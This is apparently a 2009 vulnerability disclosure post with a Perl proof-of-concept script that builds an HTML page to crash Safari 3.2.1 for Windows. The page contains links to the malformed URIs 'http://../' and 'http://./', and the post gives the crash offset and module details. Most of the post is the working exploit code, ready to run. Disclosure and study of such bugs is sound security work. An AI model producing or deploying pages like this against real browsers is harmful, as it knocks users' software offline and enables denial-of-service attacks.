safari321-dos.txt
Posted on 28 January 2009
original article => http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html A "malformed" http domain name , can cause that safari turn in a infinite loop wen try to resolve this domain, and it can cause at memory level a access violation wen try to write a secction that contains unknow data. See Safari_httpDoSPoc.pl file to demostrate it ! AppName: safari.exe AppVer: 3.525.27.1 ModName: safari.exe ModVer: 3.525.27.1 Offset: 00089394 ###################################################### #!/usr/bin/perl #Safari_httpDoSPoc.pl # Safari for Windows 3.2.1 Remote http: uri handler DoS # Lostmon [Lostmon@gmail.com ] #[http://lostmon.blogspot.com] $archivo = $ARGV[0]; if(!defined($archivo)) { print "Uso: $0 <archivo.html> "; } $cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title> <body>" . " "; $codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>( lostmon@gmail.com) http://lostmon.blogspot.com</h3> <P>This PoC is a malformed http URI, this causes that safari for windows<br> turn inestable and unresponsive.<br> Click THIS link.=></p><a href="http://../">Safari Die()</a> or this other =><a href="http://./">Safari Die()</a> "; $piepag = "</body></html>"; $datos = $cabecera . $codigo . $piepag; open(FILE, '>' . $archivo); print FILE $datos; close(FILE); exit; ################################################ Thnx To estrella to be my ligth Thnx to all who belive in me... -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....
